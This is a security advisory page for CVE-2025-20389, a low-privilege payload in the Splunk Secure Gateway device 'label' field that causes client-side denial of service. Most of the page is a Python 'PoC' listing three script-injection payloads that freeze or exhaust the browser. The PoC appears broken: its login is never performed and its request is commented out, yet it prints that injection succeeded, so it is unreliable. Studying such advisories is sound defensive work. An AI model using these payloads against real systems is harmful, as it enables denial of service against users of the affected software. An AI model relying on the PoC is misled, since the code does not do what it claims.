Security Vulnerability Report
CVE-2025-20389 CVSS 4.3 MEDIUM

Published: 2025-12-03 17:15:52
Last Modified: 2025-12-05 17:05:58

Description

In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and versions below 3.9.10, 3.8.58 and 3.7.28 of the Splunk Secure Gateway app on Splunk Cloud Platform, a low-privileged user that does not hold the "admin" or "power" Splunk roles could craft a malicious payload through the `label` column field after adding a new device in the Splunk Secure Gateway app. This could potentially lead to a client-side denial of service (DoS).

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L (vendor assessment, Availability impact Low)
NVD Primary Assessment: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H, base score 6.5 MEDIUM (Availability impact High)
Weakness: CWE-20 (Improper Input Validation), per the vendor

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* - VULNERABLE
Splunk Enterprise < 9.2.10
Splunk Enterprise < 9.3.8
Splunk Enterprise < 9.4.6
Splunk Enterprise < 10.0.2
Splunk Secure Gateway App (Cloud) < 3.7.28
Splunk Secure Gateway App (Cloud) < 3.8.58
Splunk Secure Gateway App (Cloud) < 3.9.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# Splunk CVE-2025-20389 PoC - Malicious label payload injection
# Target: Splunk Secure Gateway App

TARGET_URL = "https://target-splunk.com:8089"
USERNAME = "low_privilege_user"
PASSWORD = "password123"


def exploit_cve_2025_20389():
    """
    This PoC demonstrates the client-side DoS via malicious label field injection.
    The payload causes browser crash when viewing the device list.
    """
    # Login to Splunk
    session = requests.Session()
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }

    # Malicious payload for label field
    # This payload causes infinite loop and browser freeze
    malicious_payloads = [
        # Payload 1: Infinite loop causing DoS
        '<img src=x onerror="while(true){console.log(1)};">',
        # Payload 2: DOM manipulation exhaustion
        '<script>setInterval(function(){document.body.innerHTML+="<div>text</div>"},1)</script>',
        # Payload 3: Memory exhaustion via string concatenation
        '<script>var s="";while(true){s+=new Array(100000).join("X")}</script>'
    ]

    # Add device with malicious label
    for payload in malicious_payloads:
        device_data = {
            "name": "MaliciousDevice",
            "label": payload,  # Injected malicious payload
            "type": "generic"
        }

        # Send request to add device (requires low privilege)
        # POST /en-US/splunksecuregateway/devices
        headers = {
            "Content-Type": "application/json",
            "X-Splunk-Form-Key": session.cookies.get_dict().get('splunkd_key', '')
        }

        # response = session.post(
        #     f"{TARGET_URL}/en-US/splunksecuregateway/devices",
        #     json=device_data,
        #     headers=headers
        # )

        print(f"[*] Payload injected: {payload[:50]}...")

    print("[*] PoC completed - victims viewing device list will experience DoS")
    return True


if __name__ == "__main__":
    exploit_cve_2025_20389()
```

References

https://advisory.splunk.com/advisories/SVD-2025-1208 (Vendor Advisory, Splunk SVD-2025-1208)